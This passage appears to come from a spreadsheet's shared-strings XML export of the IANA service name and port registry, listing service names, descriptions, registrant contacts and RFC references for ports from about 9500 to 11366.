    <t>ismserver</t>
  </si>
  <si>
    <t>[Ian_Gordon_3]</t>
  </si>
  <si>
    <t>9501-9521</t>
  </si>
  <si>
    <t>sma-spw</t>
  </si>
  <si>
    <t>SMA Speedwire</t>
  </si>
  <si>
    <t>[SMA_Solar_Techology]</t>
  </si>
  <si>
    <t>9523-9534</t>
  </si>
  <si>
    <t>mngsuite</t>
  </si>
  <si>
    <t>Management Suite Remote Control</t>
  </si>
  <si>
    <t>[Trevor_Perkes]</t>
  </si>
  <si>
    <t>laes-bf</t>
  </si>
  <si>
    <t>Surveillance buffering function</t>
  </si>
  <si>
    <t>[Glen_Myers]</t>
  </si>
  <si>
    <t>9537-9554</t>
  </si>
  <si>
    <t>trispen-sra</t>
  </si>
  <si>
    <t>Trispen Secure Remote Access</t>
  </si>
  <si>
    <t>[Jaco_Botha]</t>
  </si>
  <si>
    <t>9556-9591</t>
  </si>
  <si>
    <t>ldgateway</t>
  </si>
  <si>
    <t>LANDesk Gateway</t>
  </si>
  <si>
    <t>[Alan_Butt]</t>
  </si>
  <si>
    <t>cba8</t>
  </si>
  <si>
    <t>LANDesk Management Agent (cba8)</t>
  </si>
  <si>
    <t>msgsys</t>
  </si>
  <si>
    <t>Message System</t>
  </si>
  <si>
    <t>pds</t>
  </si>
  <si>
    <t>Ping Discovery Service</t>
  </si>
  <si>
    <t>mercury-disc</t>
  </si>
  <si>
    <t>Mercury Discovery</t>
  </si>
  <si>
    <t>[Paul_Mclachlan]</t>
  </si>
  <si>
    <t>pd-admin</t>
  </si>
  <si>
    <t>PD Administration</t>
  </si>
  <si>
    <t>[Duk_Loi]</t>
  </si>
  <si>
    <t>vscp</t>
  </si>
  <si>
    <t>Very Simple Ctrl Protocol</t>
  </si>
  <si>
    <t>[Ake_Hedman]</t>
  </si>
  <si>
    <t>robix</t>
  </si>
  <si>
    <t>Robix</t>
  </si>
  <si>
    <t>[Evan_Rosen]</t>
  </si>
  <si>
    <t>micromuse-ncpw</t>
  </si>
  <si>
    <t>MICROMUSE-NCPW</t>
  </si>
  <si>
    <t>[Hing_Wing_To_2]</t>
  </si>
  <si>
    <t>9601-9611</t>
  </si>
  <si>
    <t>streamcomm-ds</t>
  </si>
  <si>
    <t>StreamComm User Directory</t>
  </si>
  <si>
    <t>[Brian_C_Wiles]</t>
  </si>
  <si>
    <t>iadt-tls</t>
  </si>
  <si>
    <t>iADT Protocol over TLS</t>
  </si>
  <si>
    <t>erunbook-agent</t>
  </si>
  <si>
    <t>eRunbook Agent
IANA assigned this well-formed service name as a replacement for "erunbook_agent".</t>
  </si>
  <si>
    <t>[Gerhard_Wagner]</t>
  </si>
  <si>
    <t>erunbook_agent</t>
  </si>
  <si>
    <t>eRunbook Agent</t>
  </si>
  <si>
    <t>This entry is an alias to "erunbook-agent".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>erunbook-server</t>
  </si>
  <si>
    <t>eRunbook Server
IANA assigned this well-formed service name as a replacement for "erunbook_server".</t>
  </si>
  <si>
    <t>erunbook_server</t>
  </si>
  <si>
    <t>eRunbook Server</t>
  </si>
  <si>
    <t>This entry is an alias to "erunbook-server".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>condor</t>
  </si>
  <si>
    <t>Condor Collector Service</t>
  </si>
  <si>
    <t>[Todd_Tannenbaum]</t>
  </si>
  <si>
    <t>9619-9627</t>
  </si>
  <si>
    <t>odbcpathway</t>
  </si>
  <si>
    <t>ODBC Pathway Service</t>
  </si>
  <si>
    <t>[Adrian_Hungate]</t>
  </si>
  <si>
    <t>uniport</t>
  </si>
  <si>
    <t>UniPort SSO Controller</t>
  </si>
  <si>
    <t>peoctlr</t>
  </si>
  <si>
    <t>Peovica Controller</t>
  </si>
  <si>
    <t>peocoll</t>
  </si>
  <si>
    <t>Peovica Collector</t>
  </si>
  <si>
    <t>mc-comm</t>
  </si>
  <si>
    <t>Mobile-C Communications</t>
  </si>
  <si>
    <t>[David_Ko_2]</t>
  </si>
  <si>
    <t>9633-9639</t>
  </si>
  <si>
    <t>pqsflows</t>
  </si>
  <si>
    <t>ProQueSys Flows Service</t>
  </si>
  <si>
    <t>[Sarene_Caiazza]</t>
  </si>
  <si>
    <t>9641-9665</t>
  </si>
  <si>
    <t>zoomcp</t>
  </si>
  <si>
    <t>Zoom Control Panel Game Server Management</t>
  </si>
  <si>
    <t>[Zoom_Control_Panel]</t>
  </si>
  <si>
    <t>[Joshua_Pedroza]</t>
  </si>
  <si>
    <t>xmms2</t>
  </si>
  <si>
    <t>Cross-platform Music Multiplexing System</t>
  </si>
  <si>
    <t>[Juho_Herttua]</t>
  </si>
  <si>
    <t>tec5-sdctp</t>
  </si>
  <si>
    <t>tec5 Spectral Device Control Protocol</t>
  </si>
  <si>
    <t>[Michael_Muth]</t>
  </si>
  <si>
    <t>9669-9693</t>
  </si>
  <si>
    <t>client-wakeup</t>
  </si>
  <si>
    <t>T-Mobile Client Wakeup Message</t>
  </si>
  <si>
    <t>[Michael_Schonborn]</t>
  </si>
  <si>
    <t>ccnx</t>
  </si>
  <si>
    <t>Content Centric Networking</t>
  </si>
  <si>
    <t>[Van_Jacobson_2][Simon_Barber]</t>
  </si>
  <si>
    <t>9696-9699</t>
  </si>
  <si>
    <t>board-roar</t>
  </si>
  <si>
    <t>Board M.I.T. Service</t>
  </si>
  <si>
    <t>[Francesco_Rosi]</t>
  </si>
  <si>
    <t>9701-9746</t>
  </si>
  <si>
    <t>l5nas-parchan</t>
  </si>
  <si>
    <t>L5NAS Parallel Channel</t>
  </si>
  <si>
    <t>[Lawrence_J_Dickson]</t>
  </si>
  <si>
    <t>9748-9749</t>
  </si>
  <si>
    <t>board-voip</t>
  </si>
  <si>
    <t>Board M.I.T. Synchronous Collaboration</t>
  </si>
  <si>
    <t>9751-9752</t>
  </si>
  <si>
    <t>rasadv</t>
  </si>
  <si>
    <t>9754-9761</t>
  </si>
  <si>
    <t>tungsten-http</t>
  </si>
  <si>
    <t>WSO2 Tungsten HTTP</t>
  </si>
  <si>
    <t>9763-9799</t>
  </si>
  <si>
    <t>davsrc</t>
  </si>
  <si>
    <t>WebDav Source Port</t>
  </si>
  <si>
    <t>[Ethan_Fremen]</t>
  </si>
  <si>
    <t>sstp-2</t>
  </si>
  <si>
    <t>Sakura Script Transfer Protocol-2</t>
  </si>
  <si>
    <t>[Kouichi_Takeda_2]</t>
  </si>
  <si>
    <t>davsrcs</t>
  </si>
  <si>
    <t>WebDAV Source TLS/SSL</t>
  </si>
  <si>
    <t>[Rob_Isaac]</t>
  </si>
  <si>
    <t>9803-9874</t>
  </si>
  <si>
    <t>sapv1</t>
  </si>
  <si>
    <t>Session Announcement v1</t>
  </si>
  <si>
    <t>[RFC2974]</t>
  </si>
  <si>
    <t>sd</t>
  </si>
  <si>
    <t>Session Director</t>
  </si>
  <si>
    <t>x510</t>
  </si>
  <si>
    <t>The X.510 wrapper protocol</t>
  </si>
  <si>
    <t>[ITU/TSB_(ITU-T_Study_Group_17)]</t>
  </si>
  <si>
    <t>[Erik_Andersen]</t>
  </si>
  <si>
    <t>[ITU-T X.510 / ISO/IEC 9584-11]</t>
  </si>
  <si>
    <t>kca-service</t>
  </si>
  <si>
    <t>The KX509 Kerberized Certificate Issuance Protocol in Use in 2012</t>
  </si>
  <si>
    <t>[RFC6717]</t>
  </si>
  <si>
    <t>Historically, this service has been referred to as "kca_service", but this service name does not meet the registry requirements.</t>
  </si>
  <si>
    <t>9879-9887</t>
  </si>
  <si>
    <t>cyborg-systems</t>
  </si>
  <si>
    <t>CYBORG Systems</t>
  </si>
  <si>
    <t>[Malcolm_Graham]</t>
  </si>
  <si>
    <t>gt-proxy</t>
  </si>
  <si>
    <t>Port for Cable network related data proxy or repeater</t>
  </si>
  <si>
    <t>[Dawei_Qi]</t>
  </si>
  <si>
    <t>9890-9897</t>
  </si>
  <si>
    <t>monkeycom</t>
  </si>
  <si>
    <t>MonkeyCom</t>
  </si>
  <si>
    <t>[Yuji_Kuwabara]</t>
  </si>
  <si>
    <t>sctp-tunneling</t>
  </si>
  <si>
    <t>SCTP TUNNELING</t>
  </si>
  <si>
    <t>[RFC6951]</t>
  </si>
  <si>
    <t>iua</t>
  </si>
  <si>
    <t>IUA</t>
  </si>
  <si>
    <t>[Lyndon_Ong_2]</t>
  </si>
  <si>
    <t>enrp</t>
  </si>
  <si>
    <t>enrp server channel</t>
  </si>
  <si>
    <t>enrp-sctp</t>
  </si>
  <si>
    <t>[RFC5353]</t>
  </si>
  <si>
    <t>enrp-sctp-tls</t>
  </si>
  <si>
    <t>enrp/tls server channel</t>
  </si>
  <si>
    <t>multicast-ping</t>
  </si>
  <si>
    <t>Multicast Ping Protocol</t>
  </si>
  <si>
    <t>[RFC6450]</t>
  </si>
  <si>
    <t>9904-9908</t>
  </si>
  <si>
    <t>domaintime</t>
  </si>
  <si>
    <t>[Jeffry_Dwight]</t>
  </si>
  <si>
    <t>sype-transport</t>
  </si>
  <si>
    <t>SYPECom Transport Protocol</t>
  </si>
  <si>
    <t>[Sylvain_Pedneault]</t>
  </si>
  <si>
    <t>9912-9924</t>
  </si>
  <si>
    <t>xybrid-cloud</t>
  </si>
  <si>
    <t>XYBRID Cloud</t>
  </si>
  <si>
    <t>[Rx_Networks_Inc_2]</t>
  </si>
  <si>
    <t>[Drew_Davies_2]</t>
  </si>
  <si>
    <t>9926-9949</t>
  </si>
  <si>
    <t>apc-9950</t>
  </si>
  <si>
    <t>APC 9950</t>
  </si>
  <si>
    <t>apc-9951</t>
  </si>
  <si>
    <t>APC 9951</t>
  </si>
  <si>
    <t>apc-9952</t>
  </si>
  <si>
    <t>APC 9952</t>
  </si>
  <si>
    <t>acis</t>
  </si>
  <si>
    <t>[Thomas_Guth]</t>
  </si>
  <si>
    <t>hinp</t>
  </si>
  <si>
    <t>HaloteC Instrument Network Protocol</t>
  </si>
  <si>
    <t>[HaloteC_Instruments]</t>
  </si>
  <si>
    <t>[Michel_Stam]</t>
  </si>
  <si>
    <t>alljoyn-stm</t>
  </si>
  <si>
    <t>Contact Port for AllJoyn standard messaging</t>
  </si>
  <si>
    <t>[Qualcomm_Innovation_Center]</t>
  </si>
  <si>
    <t>[Craig_Dowell]</t>
  </si>
  <si>
    <t>alljoyn-mcm</t>
  </si>
  <si>
    <t>Contact Port for AllJoyn multiplexed constrained messaging</t>
  </si>
  <si>
    <t>alljoyn</t>
  </si>
  <si>
    <t>Alljoyn Name Service</t>
  </si>
  <si>
    <t>9957-9965</t>
  </si>
  <si>
    <t>odnsp</t>
  </si>
  <si>
    <t>OKI Data Network Setting Protocol</t>
  </si>
  <si>
    <t>[Masato_Sato]</t>
  </si>
  <si>
    <t>9967-9977</t>
  </si>
  <si>
    <t>xybrid-rt</t>
  </si>
  <si>
    <t>XYBRID RT Server</t>
  </si>
  <si>
    <t>[Rx_Networks_Inc]</t>
  </si>
  <si>
    <t>[Drew_Davies]</t>
  </si>
  <si>
    <t>visweather</t>
  </si>
  <si>
    <t>Valley Information Systems Weather station data</t>
  </si>
  <si>
    <t>[Valley_Information_Systems_Inc]</t>
  </si>
  <si>
    <t>[Michael_Walsh_2]</t>
  </si>
  <si>
    <t>pumpkindb</t>
  </si>
  <si>
    <t>Event sourcing database engine with a built-in programming language</t>
  </si>
  <si>
    <t>[Eventsourcing_Inc]</t>
  </si>
  <si>
    <t>[Yurii_Rashkovskii]</t>
  </si>
  <si>
    <t>9982-9986</t>
  </si>
  <si>
    <t>dsm-scm-target</t>
  </si>
  <si>
    <t>DSM/SCM Target Interface</t>
  </si>
  <si>
    <t>[Mike_Dyslin]</t>
  </si>
  <si>
    <t>nsesrvr</t>
  </si>
  <si>
    <t>Software Essentials Secure HTTP server</t>
  </si>
  <si>
    <t>[Narayanan_Raju]</t>
  </si>
  <si>
    <t>9989-9989</t>
  </si>
  <si>
    <t>osm-appsrvr</t>
  </si>
  <si>
    <t>OSM Applet Server</t>
  </si>
  <si>
    <t>[Vinay_Gupta]</t>
  </si>
  <si>
    <t>osm-oev</t>
  </si>
  <si>
    <t>OSM Event Server</t>
  </si>
  <si>
    <t>palace-1</t>
  </si>
  <si>
    <t>OnLive-1</t>
  </si>
  <si>
    <t>[Douglas_Crockford]</t>
  </si>
  <si>
    <t>palace-2</t>
  </si>
  <si>
    <t>OnLive-2</t>
  </si>
  <si>
    <t>palace-3</t>
  </si>
  <si>
    <t>OnLive-3</t>
  </si>
  <si>
    <t>palace-4</t>
  </si>
  <si>
    <t>Palace-4</t>
  </si>
  <si>
    <t>palace-5</t>
  </si>
  <si>
    <t>Palace-5</t>
  </si>
  <si>
    <t>palace-6</t>
  </si>
  <si>
    <t>Palace-6</t>
  </si>
  <si>
    <t>distinct32</t>
  </si>
  <si>
    <t>Distinct32</t>
  </si>
  <si>
    <t>[Anoop_Tewari]</t>
  </si>
  <si>
    <t>distinct</t>
  </si>
  <si>
    <t>ndmp</t>
  </si>
  <si>
    <t>Network Data Management Protocol</t>
  </si>
  <si>
    <t>[Brian_Ehrmantraut]</t>
  </si>
  <si>
    <t>scp-config</t>
  </si>
  <si>
    <t>SCP Configuration</t>
  </si>
  <si>
    <t>[Michael_Benz]</t>
  </si>
  <si>
    <t>documentum</t>
  </si>
  <si>
    <t>EMC-Documentum Content Server Product</t>
  </si>
  <si>
    <t>[Reza_Bagherian]</t>
  </si>
  <si>
    <t>documentum-s</t>
  </si>
  <si>
    <t>EMC-Documentum Content Server Product
IANA assigned this well-formed service name as a replacement for "documentum_s".</t>
  </si>
  <si>
    <t>documentum_s</t>
  </si>
  <si>
    <t>This entry is an alias to "documentum-s".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>emcrmirccd</t>
  </si>
  <si>
    <t>EMC Replication Manager Client</t>
  </si>
  <si>
    <t>[Robert_Boudrie]</t>
  </si>
  <si>
    <t>emcrmird</t>
  </si>
  <si>
    <t>EMC Replication Manager Server</t>
  </si>
  <si>
    <t>netapp-sync</t>
  </si>
  <si>
    <t>Sync replication protocol among different NetApp platforms</t>
  </si>
  <si>
    <t>[NetApp_2]</t>
  </si>
  <si>
    <t>[Paul_Mu]</t>
  </si>
  <si>
    <t>mvs-capacity</t>
  </si>
  <si>
    <t>MVS Capacity</t>
  </si>
  <si>
    <t>[Donna_Dillenberger]</t>
  </si>
  <si>
    <t>octopus</t>
  </si>
  <si>
    <t>Octopus Multiplexer</t>
  </si>
  <si>
    <t>[Chris_Koeritz_2]</t>
  </si>
  <si>
    <t>swdtp-sv</t>
  </si>
  <si>
    <t>Systemwalker Desktop Patrol</t>
  </si>
  <si>
    <t>[Akira_Ide]</t>
  </si>
  <si>
    <t>rxapi</t>
  </si>
  <si>
    <t>ooRexx rxapi services</t>
  </si>
  <si>
    <t>[David_Ashley]</t>
  </si>
  <si>
    <t>10011-10019</t>
  </si>
  <si>
    <t>abb-hw</t>
  </si>
  <si>
    <t>Hardware configuration and maintenance</t>
  </si>
  <si>
    <t>[ABB]</t>
  </si>
  <si>
    <t>[Adam_NorÃ©n]</t>
  </si>
  <si>
    <t>10021-10022</t>
  </si>
  <si>
    <t>cefd-vmp</t>
  </si>
  <si>
    <t>Comtech EF-Data's Vipersat Management Protocol</t>
  </si>
  <si>
    <t>[Comtech]</t>
  </si>
  <si>
    <t>[Nathan_Jeffords]</t>
  </si>
  <si>
    <t>10024-10049</t>
  </si>
  <si>
    <t>zabbix-agent</t>
  </si>
  <si>
    <t>Zabbix Agent</t>
  </si>
  <si>
    <t>[Alexei_Vladishev]</t>
  </si>
  <si>
    <t>zabbix-trapper</t>
  </si>
  <si>
    <t>Zabbix Trapper</t>
  </si>
  <si>
    <t>10052-10054</t>
  </si>
  <si>
    <t>qptlmd</t>
  </si>
  <si>
    <t>Quantapoint FLEXlm Licensing Service</t>
  </si>
  <si>
    <t>[Justin_Vegso]</t>
  </si>
  <si>
    <t>10056-10079</t>
  </si>
  <si>
    <t>amanda</t>
  </si>
  <si>
    <t>Amanda</t>
  </si>
  <si>
    <t>[John_Jackson]</t>
  </si>
  <si>
    <t>famdc</t>
  </si>
  <si>
    <t>FAM Archive Server</t>
  </si>
  <si>
    <t>[Frode_Randers]</t>
  </si>
  <si>
    <t>10082-10099</t>
  </si>
  <si>
    <t>itap-ddtp</t>
  </si>
  <si>
    <t>VERITAS ITAP DDTP</t>
  </si>
  <si>
    <t>[Saugata_Guha]</t>
  </si>
  <si>
    <t>2004-05</t>
  </si>
  <si>
    <t>ezmeeting-2</t>
  </si>
  <si>
    <t>eZmeeting</t>
  </si>
  <si>
    <t>[Albert_C_Yang]</t>
  </si>
  <si>
    <t>ezproxy-2</t>
  </si>
  <si>
    <t>eZproxy</t>
  </si>
  <si>
    <t>ezrelay</t>
  </si>
  <si>
    <t>eZrelay</t>
  </si>
  <si>
    <t>swdtp</t>
  </si>
  <si>
    <t>10105-10106</t>
  </si>
  <si>
    <t>bctp-server</t>
  </si>
  <si>
    <t>VERITAS BCTP, server</t>
  </si>
  <si>
    <t>10108-10109</t>
  </si>
  <si>
    <t>nmea-0183</t>
  </si>
  <si>
    <t>NMEA-0183 Navigational Data</t>
  </si>
  <si>
    <t>[Meindert_Sprang]</t>
  </si>
  <si>
    <t>nmea-onenet</t>
  </si>
  <si>
    <t>NMEA OneNet multicast messaging</t>
  </si>
  <si>
    <t>[National_Marine_Electronics_Association]</t>
  </si>
  <si>
    <t>[Steve_Spitzer]</t>
  </si>
  <si>
    <t>netiq-endpoint</t>
  </si>
  <si>
    <t>NetIQ Endpoint</t>
  </si>
  <si>
    <t>[John_Wood]</t>
  </si>
  <si>
    <t>netiq-qcheck</t>
  </si>
  <si>
    <t>NetIQ Qcheck</t>
  </si>
  <si>
    <t>netiq-endpt</t>
  </si>
  <si>
    <t>[Gary_Weichinger]</t>
  </si>
  <si>
    <t>netiq-voipa</t>
  </si>
  <si>
    <t>NetIQ VoIP Assessor</t>
  </si>
  <si>
    <t>iqrm</t>
  </si>
  <si>
    <t>NetIQ IQCResource Managament Svc</t>
  </si>
  <si>
    <t>10118-10124</t>
  </si>
  <si>
    <t>cimple</t>
  </si>
  <si>
    <t>HotLink CIMple REST API</t>
  </si>
  <si>
    <t>[HotLink_Corporation]</t>
  </si>
  <si>
    <t>[Richard_Offer]</t>
  </si>
  <si>
    <t>10126-10127</t>
  </si>
  <si>
    <t>bmc-perf-sd</t>
  </si>
  <si>
    <t>BMC-PERFORM-SERVICE DAEMON</t>
  </si>
  <si>
    <t>bmc-gms</t>
  </si>
  <si>
    <t>BMC General Manager Server</t>
  </si>
  <si>
    <t>[Dima_Seliverstov]</t>
  </si>
  <si>
    <t>10130-10159</t>
  </si>
  <si>
    <t>qb-db-server</t>
  </si>
  <si>
    <t>QB Database Server</t>
  </si>
  <si>
    <t>[Wei_Wang]</t>
  </si>
  <si>
    <t>snmptls</t>
  </si>
  <si>
    <t>SNMP-TLS</t>
  </si>
  <si>
    <t>[RFC6353]</t>
  </si>
  <si>
    <t>snmpdtls</t>
  </si>
  <si>
    <t>SNMP-DTLS</t>
  </si>
  <si>
    <t>snmptls-trap</t>
  </si>
  <si>
    <t>SNMP-Trap-TLS</t>
  </si>
  <si>
    <t>snmpdtls-trap</t>
  </si>
  <si>
    <t>SNMP-Trap-DTLS</t>
  </si>
  <si>
    <t>10163-10199</t>
  </si>
  <si>
    <t>trisoap</t>
  </si>
  <si>
    <t>Trigence AE Soap Service</t>
  </si>
  <si>
    <t>[Brigitte_Gagne]</t>
  </si>
  <si>
    <t>rsms</t>
  </si>
  <si>
    <t>Remote Server Management Service</t>
  </si>
  <si>
    <t>[Patrick_H_Piper]</t>
  </si>
  <si>
    <t>rscs</t>
  </si>
  <si>
    <t>Remote Server Control and Test Service</t>
  </si>
  <si>
    <t>10202-10251</t>
  </si>
  <si>
    <t>apollo-relay</t>
  </si>
  <si>
    <t>Apollo Relay Port</t>
  </si>
  <si>
    <t>eapol-relay</t>
  </si>
  <si>
    <t>Relay of EAPOL frames</t>
  </si>
  <si>
    <t>[Wi-SUN_Alliance]</t>
  </si>
  <si>
    <t>[Phil_Beecher]</t>
  </si>
  <si>
    <t>10254-10259</t>
  </si>
  <si>
    <t>axis-wimp-port</t>
  </si>
  <si>
    <t>Axis WIMP Port</t>
  </si>
  <si>
    <t>[Stefan_Eriksson]</t>
  </si>
  <si>
    <t>tile-ml</t>
  </si>
  <si>
    <t>Tile remote machine learning</t>
  </si>
  <si>
    <t>[_1026_Labs]</t>
  </si>
  <si>
    <t>[Rob_Earhart]</t>
  </si>
  <si>
    <t>10262-10287</t>
  </si>
  <si>
    <t>blocks</t>
  </si>
  <si>
    <t>Blocks</t>
  </si>
  <si>
    <t>[Carl_Malamud]</t>
  </si>
  <si>
    <t>10289-10320</t>
  </si>
  <si>
    <t>cosir</t>
  </si>
  <si>
    <t>Computer Op System Information Report</t>
  </si>
  <si>
    <t>[Kevin_C_Barber]</t>
  </si>
  <si>
    <t>10322-10438</t>
  </si>
  <si>
    <t>bngsync</t>
  </si>
  <si>
    <t>BalanceNG session table synchronization protocol</t>
  </si>
  <si>
    <t>[Inlab_Software_GmbH]</t>
  </si>
  <si>
    <t>[Thomas_G._Obermair]</t>
  </si>
  <si>
    <t>10440-10442</t>
  </si>
  <si>
    <t>cirrossp</t>
  </si>
  <si>
    <t>CirrosSP Workstation Communication</t>
  </si>
  <si>
    <t>[Cirros_Document_Solutions_Ltd]</t>
  </si>
  <si>
    <t>[Andy_Garratt]</t>
  </si>
  <si>
    <t>10444-10499</t>
  </si>
  <si>
    <t>hip-nat-t</t>
  </si>
  <si>
    <t>HIP NAT-Traversal</t>
  </si>
  <si>
    <t>[Ari_Keranen]</t>
  </si>
  <si>
    <t>[RFC5770]</t>
  </si>
  <si>
    <t>10501-10539</t>
  </si>
  <si>
    <t>MOS-lower</t>
  </si>
  <si>
    <t>MOS Media Object Metadata Port</t>
  </si>
  <si>
    <t>[Eric_Thorniley]</t>
  </si>
  <si>
    <t>MOS-upper</t>
  </si>
  <si>
    <t>MOS Running Order Port</t>
  </si>
  <si>
    <t>MOS-aux</t>
  </si>
  <si>
    <t>MOS Low Priority Port</t>
  </si>
  <si>
    <t>MOS-soap</t>
  </si>
  <si>
    <t>MOS SOAP Default Port</t>
  </si>
  <si>
    <t>MOS-soap-opt</t>
  </si>
  <si>
    <t>MOS SOAP Optional Port</t>
  </si>
  <si>
    <t>10545-10547</t>
  </si>
  <si>
    <t>serverdocs</t>
  </si>
  <si>
    <t>Apple Document Sharing Service</t>
  </si>
  <si>
    <t>[Apple_Inc_3]</t>
  </si>
  <si>
    <t>[Jason_Thorpe]</t>
  </si>
  <si>
    <t>10549-10630</t>
  </si>
  <si>
    <t>printopia</t>
  </si>
  <si>
    <t>Printopia Serve</t>
  </si>
  <si>
    <t>[Decisive_Tactics_Inc]</t>
  </si>
  <si>
    <t>[Chris_Kent]</t>
  </si>
  <si>
    <t>10632-10799</t>
  </si>
  <si>
    <t>gap</t>
  </si>
  <si>
    <t>Gestor de Acaparamiento para Pocket PCs</t>
  </si>
  <si>
    <t>[Juan_Carlos_Olivares]</t>
  </si>
  <si>
    <t>10801-10804</t>
  </si>
  <si>
    <t>lpdg</t>
  </si>
  <si>
    <t>LUCIA Pareja Data Group</t>
  </si>
  <si>
    <t>[Alvaro_P_Dominguez]</t>
  </si>
  <si>
    <t>10806-10808</t>
  </si>
  <si>
    <t>nbd</t>
  </si>
  <si>
    <t>Linux Network Block Device</t>
  </si>
  <si>
    <t>[Wouter_Verhelst]</t>
  </si>
  <si>
    <t>nmc-disc</t>
  </si>
  <si>
    <t>Nuance Mobile Care Discovery</t>
  </si>
  <si>
    <t>[Gordon_Waddell]</t>
  </si>
  <si>
    <t>10811-10859</t>
  </si>
  <si>
    <t>helix</t>
  </si>
  <si>
    <t>Helix Client/Server</t>
  </si>
  <si>
    <t>[Matthew_Strange][Larry_Atkin_2]</t>
  </si>
  <si>
    <t>10861-10879</t>
  </si>
  <si>
    <t>bveapi</t>
  </si>
  <si>
    <t>BVEssentials HTTP API</t>
  </si>
  <si>
    <t>[Tri_Tech_Computers_Ltd]</t>
  </si>
  <si>
    <t>[James_Emerton]</t>
  </si>
  <si>
    <t>10881-10932</t>
  </si>
  <si>
    <t>octopustentacle</t>
  </si>
  <si>
    <t>Listen port used by the Octopus Deploy Tentacle deployment agent</t>
  </si>
  <si>
    <t>[Octopus_Deploy_Pty_Ltd]</t>
  </si>
  <si>
    <t>[Paul_Stovell]</t>
  </si>
  <si>
    <t>10934-10989</t>
  </si>
  <si>
    <t>rmiaux</t>
  </si>
  <si>
    <t>Auxiliary RMI Port</t>
  </si>
  <si>
    <t>[Eugen_Bacic_2]</t>
  </si>
  <si>
    <t>10991-10999</t>
  </si>
  <si>
    <t>irisa</t>
  </si>
  <si>
    <t>IRISA</t>
  </si>
  <si>
    <t>[V_A_Brauner]</t>
  </si>
  <si>
    <t>metasys</t>
  </si>
  <si>
    <t>Metasys</t>
  </si>
  <si>
    <t>[Tobin_Schuster]</t>
  </si>
  <si>
    <t>11002-11094</t>
  </si>
  <si>
    <t>weave</t>
  </si>
  <si>
    <t>Nest device-to-device and device-to-service application protocol</t>
  </si>
  <si>
    <t>[Nest_Labs_Inc]</t>
  </si>
  <si>
    <t>[Grant_Erickson]</t>
  </si>
  <si>
    <t>11096-11102</t>
  </si>
  <si>
    <t>origo-sync</t>
  </si>
  <si>
    <t>OrigoDB Server Sync Interface</t>
  </si>
  <si>
    <t>netapp-icmgmt</t>
  </si>
  <si>
    <t>NetApp Intercluster Management</t>
  </si>
  <si>
    <t>[Craig_Everhart]</t>
  </si>
  <si>
    <t>netapp-icdata</t>
  </si>
  <si>
    <t>NetApp Intercluster Data</t>
  </si>
  <si>
    <t>sgi-lk</t>
  </si>
  <si>
    <t>SGI LK Licensing service</t>
  </si>
  <si>
    <t>[Michel_Bourget]</t>
  </si>
  <si>
    <t>myq-termlink</t>
  </si>
  <si>
    <t>Hardware Terminals Discovery and Low-Level Communication Protocol</t>
  </si>
  <si>
    <t>[JANUS_spol]</t>
  </si>
  <si>
    <t>[Jakub_Ahmadyar]</t>
  </si>
  <si>
    <t>sgi-dmfmgr</t>
  </si>
  <si>
    <t>Data migration facility Manager (DMF) is a browser based interface to DMF</t>
  </si>
  <si>
    <t>[SGI]</t>
  </si>
  <si>
    <t>[John_Sygulla]</t>
  </si>
  <si>
    <t>sgi-soap</t>
  </si>
  <si>
    <t>Data migration facility (DMF) SOAP is a web server protocol to support remote access to DMF</t>
  </si>
  <si>
    <t>vce</t>
  </si>
  <si>
    <t>Viral Computing Environment (VCE)</t>
  </si>
  <si>
    <t>dicom</t>
  </si>
  <si>
    <t>DICOM</t>
  </si>
  <si>
    <t>[David_Clunie]</t>
  </si>
  <si>
    <t>11113-11160</t>
  </si>
  <si>
    <t>suncacao-snmp</t>
  </si>
  <si>
    <t>sun cacao snmp access point</t>
  </si>
  <si>
    <t>[Nick_Stephen]</t>
  </si>
  <si>
    <t>suncacao-jmxmp</t>
  </si>
  <si>
    <t>sun cacao JMX-remoting access point</t>
  </si>
  <si>
    <t>suncacao-rmi</t>
  </si>
  <si>
    <t>sun cacao rmi registry access point</t>
  </si>
  <si>
    <t>suncacao-csa</t>
  </si>
  <si>
    <t>sun cacao command-streaming access point</t>
  </si>
  <si>
    <t>suncacao-websvc</t>
  </si>
  <si>
    <t>sun cacao web service access point</t>
  </si>
  <si>
    <t>11166-11170</t>
  </si>
  <si>
    <t>snss</t>
  </si>
  <si>
    <t>Surgical Notes Security Service Discovery (SNSS)</t>
  </si>
  <si>
    <t>[David_Lethe]</t>
  </si>
  <si>
    <t>oemcacao-jmxmp</t>
  </si>
  <si>
    <t>OEM cacao JMX-remoting access point</t>
  </si>
  <si>
    <t>[David_Sechrest]</t>
  </si>
  <si>
    <t>t5-straton</t>
  </si>
  <si>
    <t>Straton Runtime Programing</t>
  </si>
  <si>
    <t>[COPALP]</t>
  </si>
  <si>
    <t>[Jerome_FOLLUT]</t>
  </si>
  <si>
    <t>oemcacao-rmi</t>
  </si>
  <si>
    <t>OEM cacao rmi registry access point</t>
  </si>
  <si>
    <t>oemcacao-websvc</t>
  </si>
  <si>
    <t>OEM cacao web service access point</t>
  </si>
  <si>
    <t>11176-11200</t>
  </si>
  <si>
    <t>smsqp</t>
  </si>
  <si>
    <t>[Andres_Seco_Hernande]</t>
  </si>
  <si>
    <t>dcsl-backup</t>
  </si>
  <si>
    <t>DCSL Network Backup Services</t>
  </si>
  <si>
    <t>[John_Reynolds]</t>
  </si>
  <si>
    <t>Defined TXT keys: DCSL-Service</t>
  </si>
  <si>
    <t>11203-11207</t>
  </si>
  <si>
    <t>wifree</t>
  </si>
  <si>
    <t>WiFree Service</t>
  </si>
  <si>
    <t>[Jose_Luis_Martin_Pei]</t>
  </si>
  <si>
    <t>11209-11210</t>
  </si>
  <si>
    <t>memcache</t>
  </si>
  <si>
    <t>Memory cache service</t>
  </si>
  <si>
    <t>[Trond_Norbye]</t>
  </si>
  <si>
    <t>11212-11318</t>
  </si>
  <si>
    <t>imip</t>
  </si>
  <si>
    <t>IMIP</t>
  </si>
  <si>
    <t>[Len_Zuvela]</t>
  </si>
  <si>
    <t>imip-channels</t>
  </si>
  <si>
    <t>IMIP Channels Port</t>
  </si>
  <si>
    <t>[Len_Zuvela_2]</t>
  </si>
  <si>
    <t>arena-server</t>
  </si>
  <si>
    <t>Arena Server Listen</t>
  </si>
  <si>
    <t>[Earl_Brannigan]</t>
  </si>
  <si>
    <t>11322-11366</t>
  </si>
  <si>
    <t>atm-uhas</t>
  </si>
  <si>
    <t>ATM UHAS</t>
